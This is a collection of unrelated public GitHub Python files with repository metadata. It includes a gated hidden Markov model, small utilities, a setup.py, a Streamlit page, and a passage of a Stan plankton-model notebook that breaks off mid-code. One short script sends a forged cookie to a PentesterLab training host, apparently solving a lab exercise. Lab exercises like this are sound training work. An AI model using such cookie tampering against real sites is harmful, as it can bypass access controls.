49d3fe6b4ad2a62850cc09fd55ce4e235e09ecce
|
71d304e88e996e695451be82cfb24029b4b2b9dd
|
/ghmm.py
|
98589df3885a5307a587e450b86b7e4dd1c99f84
|
[] |
no_license
|
negar7918/GHMMs
|
7875ab232e36b05febac74c3261aca811a08d77a
|
ea75d0f3bd82c0e2e046d34debff4fd352637819
|
refs/heads/master
| 2021-07-20T13:34:37.444101
| 2020-06-09T17:53:39
| 2020-06-09T17:53:39
| 177,122,775
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,871
|
py
|
# This is the implementation of the new method in the below paper published at AIME 2019:
# "Gated Hidden Markov Models for Early Prediction of Outcome of Internet-based Cognitive Behavioral Therapy"
# This implementation is intended for sequences up to length 150 and for longer ones, one should use log probabilities.
# This implementation was used with a binary-state HMM, for which EM needs only 10 iterations (a fact that is already published).
# In case of having more states, one should implement the convergence criteria properly.
# Value -1 is used to represent a missing observation or data point; here we handle missing values without imputation.
import numpy as np
def forward(params, observations, label=None):
pi, A, O = params
N = len(observations)
S = pi.shape[0]
alpha = np.zeros((N, S))
# base case
if observations[0] != -1:
alpha[0, :] = pi * O[:, observations[0]]
# handling missing
else:
alpha[0, :] = pi
# recursive case
for i in range(1, N):
for s2 in range(S):
for s1 in range(S):
transition = A[s1, s2]
# supervised part
if i == N - 1 and label is not None:
if label == s2:
transition = 1
else:
transition = 0
if observations[i] != -1:
alpha[i, s2] += alpha[i - 1, s1] * transition * O[s2, observations[i]]
# handling missing
else:
alpha[i, s2] += alpha[i - 1, s1] * transition
return alpha, np.sum(alpha[N - 1, :])
def backward(params, observations):
pi, A, O = params
N = len(observations)
S = pi.shape[0]
beta = np.zeros((N, S))
# base case
beta[N - 1, :] = 1
# recursive case
for i in range(N - 2, -1, -1):
for s1 in range(S):
for s2 in range(S):
if observations[i + 1] != -1:
beta[i, s1] += beta[i + 1, s2] * A[s1, s2] * O[s2, observations[i + 1]]
# handling missings
else:
beta[i, s1] += beta[i + 1, s2] * A[s1, s2]
return beta, np.sum(pi * O[:, observations[0]] * beta[0, :])
# this is a modified version of Baum_Welch
# threshold: is intended to compare with the fractional change
# policy: contains the begin and end indexes needed to calculate the fractional change e.g [[0, 9], [-10, -1]]
# label: is the hidden state of the GHMM which needs regulation by gate mechanism
# labels for the training data are expected to be at the end of each sequence in the training data
def ghmm(training, pi, A, O, iterations, threshold, policy, label):
pi, A, O = np.copy(pi), np.copy(A), np.copy(O)
S = pi.shape[0]
begin = policy[0]
end = policy[1]
# do several steps of EM hill climbing
for it in range(iterations):
pi1 = np.zeros_like(pi)
A1 = np.zeros_like(A)
O1 = np.zeros_like(O)
for observations in training:
obs = observations[:-1]
# compute forward-backward matrices
alpha, za = forward((pi, A, O), obs, observations[-1]) # observations[-1] is the label of the sequence
beta, zb = backward((pi, A, O), obs)
# calculate sums at the desired indexes in the sequence for fractional change
sum_begin = np.sum(obs[begin[0]:begin[1]]) + obs[begin[0]:begin[1]].count(-1)
sum_end = np.sum(obs[end[0]:end[1]]) + obs[end[0]:end[1]].count(-1)
fractional_change = (abs(sum_begin - sum_end)) / sum_begin
# M-step here, calculating the frequency of starting state, transitions and (state, obs) pairs
pi1 += alpha[0, :] * beta[0, :] / za
for i in range(0, len(obs)):
# handling missings
if obs[i] != -1:
O1[:, obs[i]] += alpha[i, :] * beta[i, :] / za
for i in range(1, len(obs)):
for s1 in range(S):
for s2 in range(S):
trans = A[s1, s2]
# gate mechanism: affect the update by considering fractional_change
if s2 == label and fractional_change < threshold:
trans = 0
if obs[i] != -1:
A1[s1, s2] += alpha[i - 1, s1] * trans * O[s2, obs[i]] * beta[i, s2] / za
else:
A1[s1, s2] += alpha[i - 1, s1] * trans * beta[i, s2] / za
# normalise pi1, A1, O1
pi = pi1 / np.sum(pi1)
for s in range(S):
A[s, :] = A1[s, :] / np.sum(A1[s, :])
O[s, :] = O1[s, :] / np.sum(O1[s, :])
return pi, A, O
# quick test
a = np.array([[0.6, 0.4], [0.4, 0.6]])
p = np.array([0.7, 0.3])
o = np.array([[0.7, 0.1, 0.2, 0, 0, 0], [0, 0., 0.3, .4, .2, .1]])
label_0, label_1 = 0, 1
# the first two sequences have fractional change higher than threshold and the other two lower
data = [[4, 4, 3, 2, -1, -1, 3, 4, 1, 1, 0, label_0],
[4, 3, 3, -1, 3, -1, 3, -1, 1, 1, 1, label_0],
[5, 5, 5, 3, 4, -1, -1, -1, 4, 5, 4, label_1],
[4, 5, -1, 3, 4, 5, -1, -1, -1, 5, 3, label_1]]
start_prob, transition_prob, emission_prob = ghmm(data, p, a, o, 10,
threshold=.51, policy=[[0, 2], [-2, -1]], label=label_0)
print(start_prob)
print(transition_prob)
print(emission_prob)
print('\n')
# do prediction for a new sequence without a label
sequence = [5, 4, -1, 4, 4, 5, -1, -1, -1, 5, 4]
fwd, s = forward((start_prob, transition_prob, emission_prob), sequence)
prob = fwd[len(sequence) - 1, 1] / s
print("prediction probability: {}".format(prob))
print("predicted label: {}".format(1 if prob > .5 else 0))
|
[
"negars@kth.se"
] |
negars@kth.se
|
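The comments at the top of ghmm.py explain that forward and backward both handle missing observations, but the quick test at the end only uses the forward pass. A short sketch of combining the two passes into smoothed posterior state probabilities, meant to be appended after the quick test and reusing its names (forward, backward, start_prob, transition_prob, emission_prob, sequence); it is not part of the original file:

import numpy as np

# gamma[t, s] = P(state_t = s | whole observation sequence)
alpha, _ = forward((start_prob, transition_prob, emission_prob), sequence)
beta, _ = backward((start_prob, transition_prob, emission_prob), sequence)
gamma = alpha * beta
gamma = gamma / gamma.sum(axis=1, keepdims=True)  # normalise each time step
print(gamma[:, 1])  # per-timestep probability of the label-1 state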
aab5b930200d680d23a2dbddf6c89da66a40ebc7
|
9460ee7136f277825b09e5f63675364461deacea
|
/GATE_Engine/libs/par/test/hierarchy.py
|
2f4e7fa88ecb974f8c8b074c616372ebccf3eb99
|
[
"MIT"
] |
permissive
|
DocDonkeys/GATE_Engine
|
9c4a5376e10e20774c20ec3f069b973e754cb058
|
bb2868884c6eec0ef619a45b7e21f5cf3857fe1b
|
refs/heads/master
| 2020-07-27T09:18:46.947405
| 2019-12-30T16:16:11
| 2019-12-30T16:16:11
| 209,041,360
| 1
| 3
|
MIT
| 2020-02-19T16:32:08
| 2019-09-17T11:58:13
|
C++
|
UTF-8
|
Python
| false
| false
| 442
|
py
|
import json
flare = json.load(open('flare.json'))
print flare
things = []
def traverse(node, parent):
me = len(things)
print '{:3} {}'.format(me, node['name'])
things.append(parent)
children = node.get('children', [])
for child in children:
traverse(child, me)
traverse(flare, 0)
for i in xrange(len(things)):
print '{:3},'.format(things[i]),
if (i + 1) % 12 == 0: print;
print '---\n', len(things)
|
[
"36265669+DidacRomero@users.noreply.github.com"
] |
36265669+DidacRomero@users.noreply.github.com
|
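hierarchy.py above is Python 2 (print statements, xrange) and builds a flat array in which entry i holds the index of node i's parent, via a depth-first walk of flare.json. For readers on a current interpreter, a Python 3 sketch of the same traversal, assuming the same flare.json layout (nodes with 'name' and an optional 'children' list):

import json

def build_parent_array(root):
    """Depth-first traversal; parents[i] is the index of node i's parent."""
    parents = []

    def traverse(node, parent_index):
        me = len(parents)
        parents.append(parent_index)
        for child in node.get('children', []):
            traverse(child, me)

    traverse(root, 0)  # the root points at index 0, as in the original script
    return parents

if __name__ == '__main__':
    with open('flare.json') as f:
        flare = json.load(f)
    parents = build_parent_array(flare)
    print(len(parents))
    print(parents[:12])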
82355523e5e347b9831a1ae711165e2ece5d664f
|
4aae80d02949928e859ea9536051f59ed14ec918
|
/apartment/house_summary.py
|
12793965147a94786cc6eaa2e1738a092d991116
|
[] |
no_license
|
xli1234/PythonProject
|
a6c5c61b8fb86d8b9b7dc2d39d3784db3184a46b
|
e2555e8befd086ac98881a91630b1260cf6709f0
|
refs/heads/master
| 2020-07-31T05:46:11.688485
| 2019-10-08T02:04:42
| 2019-10-08T02:04:42
| 210,504,536
| 4
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 535
|
py
|
import pandas as pd
def summary_house():
df = pd.read_csv('apartment/house_cache.csv')
zip_area = {15213: 'Oakland', 15217: 'Squirrel Hill', 15232: 'Shadyside'}
house_count = list(df[['Zip', 'Street']].groupby('Zip').count().values.reshape(3))
house_area = list(df[['Zip', 'Street']].groupby('Zip').count().index)
print('All three areas'.rjust(20), str(sum(house_count)).rjust(5), 'houses/apartments')
for i in range(len(house_area)):
print(zip_area[house_area[i]].rjust(20), str(house_count[i]).rjust(5), 'houses/apartments')
|
[
"34395567+shenshopping@users.noreply.github.com"
] |
34395567+shenshopping@users.noreply.github.com
|
09b1947d280f745d62a37740eb2545109fa7aba2
|
9ee0f0850d8743d08a2ecdf16e0e79ad58615908
|
/Arrendador/serializers.py
|
cabceb1ac480eb63740d2b5e64a3c8ee0f187ca9
|
[] |
no_license
|
alexgrajales/plataforma-web-de-gesti-n-de-inmuebles-para-arrendatarios-independientes.
|
20fb4ebb60940cd9fa40010515e8116cb4418d39
|
ce335f05ff6f217a5c3b94022b51bf37b46adf5c
|
refs/heads/master
| 2022-11-04T08:01:14.427926
| 2017-12-01T22:16:56
| 2017-12-01T22:16:56
| 110,597,537
| 0
| 1
| null | 2022-10-05T04:58:51
| 2017-11-13T20:20:53
|
Python
|
UTF-8
|
Python
| false
| false
| 271
|
py
|
from rest_framework import serializers
from rest_framework_mongoengine import serializers as mongoserializers
from Arrendador.models import Arrendador
class ArrendadorSerializer(mongoserializers.DocumentSerializer):
class Meta:
model = Arrendador
fields = '__all__'
|
[
"alex-12-04@hotmail.com"
] |
alex-12-04@hotmail.com
|
3ae6423a2a19cb9678453bb48e72fd82b6afb002
|
36a92a0af4e4fa2b8191ddb8b0f0b8ed15c2baca
|
/send-cookies.py
|
999fd98911a1e0cbd4ef3f5f1e1606a3e11aad21
|
[] |
no_license
|
p4r7h/Python-script
|
043d6b70387f1834fac147e0ee88cfbb416ea205
|
45e0c39849c0a885b26db433cdfa94f885e1988b
|
refs/heads/main
| 2023-06-12T03:09:26.333375
| 2021-06-21T01:23:08
| 2021-06-21T01:23:08
| 344,584,712
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 141
|
py
|
import requests
url = 'http://ptl-e1cf1322-eb626166.libcurl.so/pentesterlab'
x = requests.get(url, cookies = {'key': 'please'})
print(x.text)
|
[
"noreply@github.com"
] |
p4r7h.noreply@github.com
|
e6f8f51a840280d413cfe95488d13ed729fe6b2e
|
3c2bb35d04a2dd44e16366c6e52eb74ecf8ba87b
|
/linearsearch.py
|
27f9b69282c90729ee8439a664c1be6609b2dad0
|
[] |
no_license
|
Brijesh-Pandey/Python-Programs-For-Noobs
|
7c871ebf01ce5f9e4cfa53b100b8f1b569f72a5d
|
1d7187986a26d3f7ebcf3699017ab242dd16b482
|
refs/heads/main
| 2023-08-18T01:46:22.533629
| 2021-10-09T20:06:30
| 2021-10-21T01:37:49
| 301,089,699
| 6
| 11
| null | 2021-05-18T09:27:14
| 2020-10-04T09:32:23
|
Python
|
UTF-8
|
Python
| false
| false
| 247
|
py
|
z=int(input("Enter element to be searched "))
li=[int(x) for x in input().split()]
for i in range(len(li)):
if li[i]==z:
flag=1
break
else:
flag=0
if flag==1:
print("Found at position ",+i+1 )
else:
print("Not found")
input()
|
[
"noreply@github.com"
] |
Brijesh-Pandey.noreply@github.com
|
9c49e6ca3bd2a42e53334ed4c4c2dee500c889b3
|
ee1db6398a73882e750c86257b43390c5ec2a654
|
/fpm/setup.py
|
84cf025ee77323c37d5387470fd713ac4504e1a1
|
[
"MIT"
] |
permissive
|
gscigala/packet-generation
|
c795131e202e59d16fc99eca61008b850df9c6c5
|
137b2853e57756a9ade1af2e95c8b2839f401121
|
refs/heads/master
| 2021-01-23T03:12:48.984559
| 2017-04-04T13:50:46
| 2017-04-04T13:50:46
| 86,057,836
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,869
|
py
|
"""A setuptools based setup module.
See:
https://packaging.python.org/en/latest/distributing.html
https://github.com/pypa/sampleproject
"""
# Always prefer setuptools over distutils
from setuptools import setup, find_packages
# To use a consistent encoding
from codecs import open
from os import path
here = path.abspath(path.dirname(__file__))
# Get the long description from the README file
with open(path.join(here, 'README.rst'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='test_sample',
# Versions should comply with PEP440. For a discussion on single-sourcing
# the version across setup.py and the project code, see
# https://packaging.python.org/en/latest/single_source_version.html
version='1.0.0',
description='A GStreamer test video project',
long_description=long_description,
# The project's main homepage.
url='https://github.com/gscigala/packet-generation',
# Author details
author='Guillaume Scigala',
author_email='guillaume@scigala.fr',
# Choose your license
license='MIT',
# See https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 3 - Alpha',
# Indicate who your project is intended for
'Intended Audience :: Developers',
'Topic :: Software Development :: Build Tools',
# Pick your license as you wish (should match "license" above)
'License :: OSI Approved :: MIT License',
# Specify the Python versions you support here. In particular, ensure
# that you indicate whether you support Python 2, Python 3 or both.
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7'
],
# What does your project relate to?
keywords='sample setuptools development streaming',
# You can just specify the packages manually here if your project is
# simple. Or you can use find_packages().
packages=find_packages(exclude=['contrib', 'docs', 'tests']),
# Alternatively, if you want to distribute just a my_module.py, uncomment
# this:
# py_modules=["my_module"],
# List run-time dependencies here. These will be installed by pip when
# your project is installed. For an analysis of "install_requires" vs pip's
# requirements files see:
# https://packaging.python.org/en/latest/requirements.html
#install_requires=['peppercorn'],
# List additional groups of dependencies here (e.g. development
# dependencies). You can install these using the following syntax,
# for example:
# $ pip install -e .[dev,test]
extras_require={
#'dev': ['check-manifest'],
#'test': ['coverage'],
},
# If there are data files included in your packages that need to be
# installed, specify them here. If using Python 2.6 or less, then these
# have to be included in MANIFEST.in as well.
package_data={
'test_sample': [
'data/logging.conf'
],
},
# Although 'package_data' is the preferred approach, in some case you may
# need to place data files outside of your packages. See:
# http://docs.python.org/3.4/distutils/setupscript.html#installing-additional-files # noqa
# In this case, 'data_file' will be installed into '<sys.prefix>/my_data'
#data_files=[('my_data', ['data/data_file'])],
# To provide executable scripts, use entry points in preference to the
# "scripts" keyword. Entry points provide cross-platform support and allow
# pip to create the appropriate form of executable for the target platform.
entry_points={
'console_scripts': [
'testSample=test_sample.__main__:main',
],
},
)
|
[
"guillaume.scigala@smile.fr"
] |
guillaume.scigala@smile.fr
|
3a605cd5f0f7781f3d75d4937b802eac9ac2dd09
|
4accbb2bb2f7cc2b6b5855afe52c1bb4561c8da6
|
/Unstructured Programs For Testing/CSVtoNumpy2.py
|
85b4f08e7b464e239c7ab173dd45a90b55e10ebf
|
[] |
no_license
|
WrathTitan/DLNeuralNetwork
|
e993f37faca865c369138ea61b346f9a998ad690
|
c82ba35c1cf6cd20c573200d4c3f038e8f434d9e
|
refs/heads/master
| 2023-04-04T06:50:19.007794
| 2021-04-23T16:18:10
| 2021-04-23T16:18:10
| 307,389,978
| 0
| 0
| null | 2020-10-29T16:24:58
| 2020-10-26T13:57:02
|
Python
|
UTF-8
|
Python
| false
| false
| 565
|
py
|
import numpy as np
import csv
myarr=np.genfromtxt('superfilteredFinal.csv',delimiter=',')
print(myarr)
print(myarr.shape)
print(myarr.T)
print("Ended one file")
mynewarr=np.genfromtxt('filteredFinal.csv',delimiter=',')
awesomestuff=mynewarr[:,1:]
print(awesomestuff)
print(awesomestuff.shape)
print(awesomestuff.T)
#my_data=pd.read_csv('superfilteredFinal.csv',sep=',',header=None)
#data_X=my_data.T
#print(data_X)
#print(data_X.shape)
#my_data=pd.read_csv('filteredFinal.csv',sep=',',header=None).T
#data_Y=my_data.iloc[1:,]
#print(data_Y)
#print(data_Y.shape)
|
[
"rishabhbhatt159@gmail.com"
] |
rishabhbhatt159@gmail.com
|
f794cd1dae5cb4ed8da0fc22286c5a047b86c2fa
|
d8a541a2953c9729311059585bb0fca9003bd6ef
|
/Lists as stack ques/cups_and_bottles.py
|
efc8af013cd606d663a6539b7b98d2807e6c28fc
|
[] |
no_license
|
grigor-stoyanov/PythonAdvanced
|
ef7d628d2b81ff683ed8dd47ee307c41b2276dd4
|
0a6bccc7faf1acaa01979d1e23cfee8ec29745b2
|
refs/heads/main
| 2023-06-10T09:58:04.790197
| 2021-07-03T02:52:20
| 2021-07-03T02:52:20
| 332,509,767
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 604
|
py
|
from collections import deque
cups = deque(map(int, input().split()))
bottles = list(map(int, input().split()))
wasted_water = 0
while cups and bottles:
current_cup = cups.popleft()
while current_cup > 0 and bottles:
current_bottle = bottles.pop()
current_cup -= current_bottle
if current_cup < 0:
wasted_water += -current_cup
if not cups:
print('Bottles: ', end='')
print(*[bottles.pop() for i in range(len(bottles))])
else:
print('Cups: ', end='')
print(*[cups.popleft() for i in range(len(cups))])
print(f'Wasted litters of water: {wasted_water}')
|
[
"76039296+codelocks7@users.noreply.github.com"
] |
76039296+codelocks7@users.noreply.github.com
|
407664d79d63688fa1904fc5d1148aa5d8d4d2ce
|
d1b6ca6d310d646b64385ed87fed71ccec1cb6e3
|
/about_page.py
|
d42e1a4def82ac173833b9d7e2fa07e51909c25b
|
[] |
no_license
|
skaushikk/USCIS-tracker
|
7053d5af295632c8c1fa4ca0579cbf56e33497a4
|
1f4219c311f1a99a682fca6789e7922747338d2a
|
refs/heads/main
| 2023-04-24T18:08:03.714906
| 2021-05-09T02:16:55
| 2021-05-09T02:16:55
| 361,353,468
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,714
|
py
|
import streamlit as st
def app():
st.title('USCIS Case Status Analyzer')
st.subheader('Check, Analyze and Predict USCIS Application Status')
# st.markdown("<h3 style='text-align: right; color: gray;'>-- Kaushik Sirvole</h3>", unsafe_allow_html=True)
with st.beta_expander("ABOUT", expanded=True):
# st.subheader('ABOUT')
        st.write('The USCIS Case Status Tracker app is built to help people who have a pending '
                 'application with the United States Citizenship and Immigration Services (USCIS) '
                 'by educating them and by tracking and predicting their case against other similar '
                 'applications. Similar applications are defined as those of the same kind, filed from '
                 'the same locations and during similar time periods.')
        st.write('The current indefinite and uncertain timelines, driven by the political climate and COVID '
                 'protocols, have resulted in unprecedented strain on USCIS servicing capabilities and, '
                 'consequently, extreme stress on applicants whose lives are on hold awaiting adjudication.')
        st.write('Furthermore, this app provides a platform for broader, more in-depth analysis and prediction.')
with st.beta_expander("DISCLAIMER", expanded=False):
st.write('The application does not store any user information at all. All the information provided is from '
'publicly available data.')
with st.beta_expander("KNOWLEDGEBASE", expanded=False):
st.write("The details on different types of forms, terminology can be found in the USCIS information pages"
"https://www.uscis.gov/tools/a-z-index")
# st.selectbox()
|
[
"skaushikk@gmail.com"
] |
skaushikk@gmail.com
|
fc140be5ed838830be722cb050742cde1b3cb053
|
87455bab2ddf7c9312453ca74689b133f3d6745d
|
/case_studies/npz/scripts/npz_narragansett_py.py
|
879eba3573907047de566834166742228e1a45bb
|
[] |
no_license
|
maxEntropyProd/bayesian_cbiomes
|
dd87d7f88e127e5f0699d15ae0ec3f2380b9ba89
|
c3a2f2e60f2271a0a4843e9db6be2111b765efa1
|
refs/heads/master
| 2020-12-06T06:30:34.433777
| 2020-01-10T14:06:20
| 2020-01-10T14:06:20
| 232,373,541
| 0
| 0
| null | 2020-01-07T17:01:40
| 2020-01-07T17:01:39
| null |
UTF-8
|
Python
| false
| false
| 14,243
|
py
|
#!/usr/bin/env python
# coding: utf-8
# # Confront the NPZ model with real data from Narragansett Bay
#
# ## 1. A first look at the data
# In[1]:
import numpy as np
# load data from CSV file
datafile = 'data/data_npz_narragansett.csv'
data = np.loadtxt(datafile, skiprows=1, delimiter=',')
with open(datafile) as f:
data_names = f.readline().strip().split(',')
print(data_names)
# In[14]:
import matplotlib.pyplot as plt
fig, axs = plt.subplots(nrows=4, sharex=True, sharey=True, figsize=(12,12))
for iax,ax in enumerate(axs.flat[:-1]):
ax.plot(data[:,0], data[:,iax+1])
ax.set_ylabel(data_names[iax+1])
ax.grid(True)
axs[0].set_title('Narragansett Bay NPZ data')
axs[0].axhline(0.25, color='darkred')
axs[-1].plot(data[:,0], np.sum(data[:,1:],axis=1))
axs[-1].set(xlabel=data_names[0], ylabel='sum', xticks=np.arange(0.0,data[-1,0],365.0))
axs[-1].grid(True)
# ### challenges for fitting data:
# * high noise level
# * no conservation of mass while NPZ model conserves mass
# ## 2. Modifications to the NPZ model
#
# allow influx and loss of N in the model:
# * introduce a background concentration for each variable and allow mixing with that background concentration
# * have a winter period for each year with stronger mixing and different background concentrations
# * estimate start and duration of winter period for each year (initial guess is based on data)
# * estimate background concentrations for winter and regular period (same for each year)
#
#
# In[3]:
# base initial guess of start and duration of the winter period based on N crossing a 0.25 threshold
stan_code_dataparams = '''data {
int<lower=0> nobs; // number of timesteps with observations
real<lower=0> tobs[nobs]; // obs times
int<lower=0> nobsvar; // number of observed variables
int<lower=0> iobsvar[nobsvar]; // index of observed variable (N=1, P=2, Z=3)
real<lower=0> obs[nobs,nobsvar]; // observed variable at measurement times
int<lower=0> nyears; // number of years (number of winters to add to the model)
}
transformed data {
real wintermixstart_guess[nyears];
real wintermixduration_guess[nyears];
{
int start = 0;
int iyear = 1;
real thresh = 0.25;
for (it in 1:nobs){
if (start == 0 && obs[it,1] >= thresh){
start = 1;
wintermixstart_guess[iyear] = tobs[it];
} else if (start == 1 && obs[it,1] < thresh && obs[it+1,1] < thresh){
start = 0;
wintermixduration_guess[iyear] = tobs[it] - wintermixstart_guess[iyear];
wintermixstart_guess[iyear] -= 365.0*(iyear-1);
iyear += 1;
if (iyear > nyears){
break;
}
}
}
}
// will be printed once by every chain
print("wintermixstart_guess = ",wintermixstart_guess);
print("wintermixduration_guess = ",wintermixduration_guess);
}
parameters {
real<lower=0> vmax; // maximum growth rate in Michaelis Menten formulation
real<lower=0> nuthalfsat; // nutrient half saturation in Michaelis Menten formulation
real<lower=0> graz; // zooplankton grazing rate
real<lower=0> mort_p; // phytoplankton mortality rate
real<lower=0> mort_z; // zooplankton mortality rate
real<lower=0> bgconc_n1; // N background concentration regular
real<lower=0> bgconc_n2; // N background concentration winter
real<lower=0> bgconc_p1; // P background concentration regular
real<lower=0> bgconc_p2; // P background concentration winter
real<lower=0> bgconc_z1; // Z background concentration regular
real<lower=0> bgconc_z2; // Z background concentration winter
real<lower=0> mix1; // mixing strength regular
real<lower=0> mix2; // mixing strength winter
real<lower=-100.0,upper=200.0> wintermixstart[nyears]; // start of winter mixing, restricted to broad winter period
real<lower=0> wintermixduration[nyears]; // duration of winter mixing
real<lower=1E-15> sigma[nobsvar]; // observation error standard deviations
real<lower=0> x0[3]; // initial conditions
}
transformed parameters {
real theta[13+2*nyears];
real x[nobs,3];
theta[1] = vmax;
theta[2] = nuthalfsat;
theta[3] = graz;
theta[4] = mort_p;
theta[5] = mort_z;
theta[6] = bgconc_n1;
theta[7] = bgconc_n2;
theta[8] = bgconc_p1;
theta[9] = bgconc_p2;
theta[10] = bgconc_z1;
theta[11] = bgconc_z2;
theta[12] = mix1;
theta[13] = mix2;
for (iyear in 1:nyears){
theta[13+2*iyear-1] = wintermixstart[iyear] + (iyear-1)*365.0;
theta[13+2*iyear] = theta[13+2*iyear-1] + wintermixduration[iyear];
}
x = integrate_ode_rk45(npz, x0, -1, tobs, theta,
rep_array(0.0, 0), rep_array(0, 0),
1e-5, 1e-4, 2e3*nyears);
}
'''
# In[4]:
# for now, do not fit data
stan_code_model_nofit = '''model {
x0[1] ~ normal(0.3, 0.1); // prior on N initial conditions
x0[2] ~ normal(0.1, 0.1); // prior on P initial conditions
x0[3] ~ normal(0.1, 0.1); // prior on Z initial conditions
sigma ~ exponential(1.0);
// priors for parameters
vmax ~ normal(0.15, 0.03);
nuthalfsat ~ normal(0.17, 0.04);
graz ~ normal(0.15, 0.04);
mort_p ~ normal(0.02, 0.01);
mort_z ~ normal(0.02, 0.005);
bgconc_n1 ~ normal(0.01, 0.001); // (regular)
bgconc_n2 ~ normal(0.66, 0.08); // (winter)
bgconc_p1 ~ normal(0.11, 0.01); // (regular)
bgconc_p2 ~ normal(0.05, 0.005); // (winter)
bgconc_z1 ~ normal(0.09, 0.01); // (regular)
bgconc_z2 ~ normal(0.05, 0.03); // (winter)
mix1 ~ normal(0.01, 0.03); // (regular)
mix2 ~ normal(0.19, 0.02); // (winter)
for (iyear in 1:nyears){
wintermixstart[iyear] ~ normal(wintermixstart_guess[iyear], 10.0);
wintermixduration[iyear] ~ normal(wintermixduration_guess[iyear], 10.0);
}
// no fitting of data yet
}
'''
# In[5]:
# mixing/exchange with background concentrations is implemented using a nudging/relaxation term
stan_code_functions = '''functions {
real[] npz(real t, // time
real[] x, // state
real[] theta, // parameters
real[] x_r, // real-valued input data (empty)
int[] x_i) { // integer-valued input data (empty)
/*
guide to theta:
theta[1]: vmax maximum growth rate in Michaelis Menten formulation
theta[2]: nuthalfsat nutrient half saturation in Michaelis Menten formulation
theta[3]: graz zooplankton grazing rate
theta[4]: mort_p phytoplankton mortality rate
theta[5]: mort_z zooplankton mortality rate
theta[6]: bgconc_n1 N background concentration regular
theta[7]: bgconc_n2 N background concentration winter
theta[8]: bgconc_p1 P background concentration regular
theta[9]: bgconc_p2 P background concentration winter
theta[10]: bgconc_z1 Z background concentration regular
theta[11]: bgconc_z2 Z background concentration winter
theta[12]: mix1 mixing strength regular
theta[13]: mix2 mixing strength winter
theta[14]: start time of first winter
theta[15]: stop time of first winter
theta[16]: start time of second winter
theta[17]: stop time of second winter
... number of winters is set to nyears
*/
real n = fmax(0.0, x[1]);
real p = fmax(0.0, x[2]);
real z = fmax(0.0, x[3]);
real growth = theta[1]*n/(theta[2]+n) * p; // nutrient-dependent growth
real grazing = theta[3]*p*z; // grazing
real ploss = theta[4]*p; // linear phytoplankton mortality
real zloss = theta[5]*z*z; // quadratic zooplankton mortality
// N,P,Z gain or loss terms due to mixing/exchange with background
real exch_n;
real exch_p;
real exch_z;
int i = 14;
while (i <= size(theta) && t>=theta[i]){
i += 1;
}
if ((i-13)%2 == 1){
// regular (non-winter) time
exch_n = theta[12]*(theta[6]-n);
exch_p = theta[12]*(theta[8]-p);
exch_z = theta[12]*(theta[10]-z);
} else {
// winter time
exch_n = theta[13]*(theta[7]-n);
exch_p = theta[13]*(theta[9]-p);
exch_z = theta[13]*(theta[11]-z);
}
return {-growth+ploss+zloss+exch_n,growth-grazing-ploss+exch_p,grazing-zloss+exch_z};
}
}
'''
# ## 3. Sampling from the prior
#
# Because we are not yet fitting data in the model, the Stan output are samples from the prior model solution.
# In[6]:
import pystan
# stitch together the code and compile it
stan_code = stan_code_functions + stan_code_dataparams + stan_code_model_nofit
model = pystan.StanModel(model_code=stan_code, model_name='NPZ')
# In[7]:
# reduce the dataset (to decrease runtime)
nyears = 2
index = data[:,0] <= nyears * 365
stan_data = {
'nobs':sum(index),
'tobs':data[index,0],
'nobsvar':3,
'iobsvar':(1,2,3), # all variables are observed
'obs':data[index,1:],
'nyears':nyears,
}
# In[8]:
# run the model, note low number of iterations/length of chain
mcmc = model.sampling(data=stan_data, iter=1000)
print(mcmc)
# In[9]:
# plot 100 randomly chosen prior solutions
index_prior = np.random.choice(mcmc['x'].shape[0], 100, replace=False)
t = data[index,0]
fig, axs = plt.subplots(nrows=4, sharex=True, sharey=True, figsize=(12,12))
for iax,ax in enumerate(axs.flat[:-1]):
ax.plot(t, data[index,iax+1])
ax.plot(t, mcmc['x'][index_prior,:,iax].T, color='k', alpha=0.1)
ax.set_ylabel(data_names[iax+1])
ax.grid(True)
axs[0].set_title('Narragansett Bay NPZ data and samples from the model prior')
axs[-1].plot(t, np.sum(data[index,1:],axis=1))
axs[-1].plot(t, np.sum(mcmc['x'][index_prior,:,:],axis=2).T, color='k', alpha=0.1)
axs[-1].set(xlabel=data_names[0], ylabel='sum', xticks=np.arange(0.0,nyears*365.0,365.0))
axs[-1].grid(True)
None
# ## 4. Reparameterizing the model and fitting data
#
# Normally we would use a statement like
# ```
# for(i in 1:nobsvar){
# for (iobs in 1:nobs){
# obs[iobs,i] ~ normal(x[iobs,iobsvar[i]], sigma[i]);
# }
# }
# ```
# in Stan's model block to fit the data. When formulated this way, Stan can have trouble sampling from the posterior distribution, for example when `sigma[i]` changes greatly for different values of `x[iobs,iobsvar[i]]`.
#
# Here it helps *a lot* (decrease in runtime by 1-2 orders of magnitude) to reparameterize the model:
# ```
# for(i in 1:nobsvar){
# for (iobs in 1:nobs){
# obs_normalized = (obs[iobs,i]-x[iobs,iobsvar[i]])/sigma[i];
# obs_normalized ~ std_normal();
# }
# }
# ```
#
# For more information, see the corresponding section in the [Stan user guide](https://mc-stan.org/docs/stan-users-guide/reparameterization-section.html).
# In[10]:
# reparameterized model block
stan_code_model = '''model {
real obs_normalized;
x0[1] ~ normal(0.3, 0.1); // prior on N initial conditions
x0[2] ~ normal(0.1, 0.1); // prior on P initial conditions
x0[3] ~ normal(0.1, 0.1); // prior on Z initial conditions
sigma ~ exponential(1.0);
// priors for parameters
vmax ~ normal(0.15, 0.03);
nuthalfsat ~ normal(0.17, 0.04);
graz ~ normal(0.15, 0.04);
mort_p ~ normal(0.02, 0.01);
mort_z ~ normal(0.02, 0.005);
bgconc_n1 ~ normal(0.01, 0.001); // (regular)
bgconc_n2 ~ normal(0.66, 0.08); // (winter)
bgconc_p1 ~ normal(0.11, 0.01); // (regular)
bgconc_p2 ~ normal(0.05, 0.005); // (winter)
bgconc_z1 ~ normal(0.09, 0.01); // (regular)
bgconc_z2 ~ normal(0.05, 0.03); // (winter)
